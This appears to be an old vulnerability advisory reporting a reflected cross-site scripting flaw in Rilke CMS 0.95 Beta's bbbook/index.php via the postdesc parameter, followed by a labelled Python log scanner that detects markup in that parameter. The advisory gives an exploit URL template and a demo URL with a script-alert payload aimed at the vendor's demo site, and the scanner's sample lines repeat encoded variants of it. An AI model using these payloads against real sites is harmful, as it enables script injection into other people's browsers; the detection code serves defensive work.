Rilke CMS version 0.95 Beta suffers from a cross-site scripting (XSS) vulnerability.
===========================================================================================
Title : Cross-site Scripting (XSS) Vulnerability
Software : Rilke CMS v0.95 Beta
Vendor : http://www.rilkecms.com/
Date : 26 April 2009 (Indonesia)
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : http://c0li.blogspot.com/
===========================================================================================
[-] Vulnerable
./bbbook/index.php
[-] Exploit
http://[site]/[path]/bbbook/index.php?postdesc=[XSS]
[-] Demo
http://www.rilkecms.com/demo/bbbook/index.php?postdesc=<script>alert(123)</script>
===========================================================================================
Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh for the one I love (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
===========================================================================================
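
Added example (not part of the original advisory and not Rilke CMS code): a log check that flags requests to bbbook/index.php whose postdesc value decodes to HTML markup, including percent-encoded and double-encoded forms. The combined access-log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

VULN_PATH = "/bbbook/index.php"   # script named in the advisory
PARAM = "postdesc"                # parameter named in the advisory

# Assumption: Apache/Nginx "combined" access-log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic: an opening/closing tag or an inline event-handler attribute.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=", re.I)

# Constructed sample lines (documentation IP range, not real traffic).
SAMPLE_LINES = [
    '192.0.2.10 - - [26/Apr/2009:10:00:00 +0700] "GET /demo/bbbook/index.php?postdesc=<script>alert(123)</script> HTTP/1.1" 200 512',
    '192.0.2.11 - - [26/Apr/2009:10:00:05 +0700] "GET /bbbook/index.php?postdesc=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1" 200 512',
    '192.0.2.12 - - [26/Apr/2009:10:00:09 +0700] "GET /bbbook/index.php?postdesc=%253Cscript%253Ealert(123)%253C%252Fscript%253E HTTP/1.1" 200 512',
    '192.0.2.13 - - [26/Apr/2009:10:01:00 +0700] "GET /bbbook/index.php?postdesc=Hello+world HTTP/1.1" 200 512',
    '192.0.2.14 - - [26/Apr/2009:10:02:00 +0700] "GET /other.php?postdesc=<script>alert(123)</script> HTTP/1.1" 404 128',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_postdesc(log_line):
    """Return the decoded postdesc value if it carries markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith(VULN_PATH):
        return None
    # parse_qs decodes once; fully_decode handles any extra encoding layers.
    for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw)
        if MARKUP_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = ((n, suspicious_postdesc(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in hits if value is not None]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LINES):
        print(f"line {number}: postdesc carries markup: {value!r}")
```

A hit only shows that markup was sent in postdesc; whether the page echoed it unencoded has to be confirmed against the response or the application code.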